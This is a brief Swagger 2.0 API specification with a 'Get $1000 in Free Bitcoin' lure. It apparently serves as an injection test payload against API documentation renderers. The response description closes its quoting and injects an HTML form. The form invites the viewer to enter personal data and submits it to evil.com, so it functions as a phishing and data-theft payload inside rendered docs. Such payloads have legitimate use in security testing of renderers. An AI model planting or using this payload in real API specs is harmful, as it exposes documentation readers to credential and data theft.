 
swagger: '2.0'
info:
  title: Get $1000 in Free Bitcoin
  description: |
    Teste
paths:
  /Free Bitcoin (Click Here):
    get:
      responses:
        '200':
          description: No response was specified'"><form action='https://evil.com'><label>Personal Data: </label><input type='text'><input type='submit' value='Send'></form>
      tags:
        - Free Bitcoin
      operationId: findAccounts
      summary: Finds all accounts
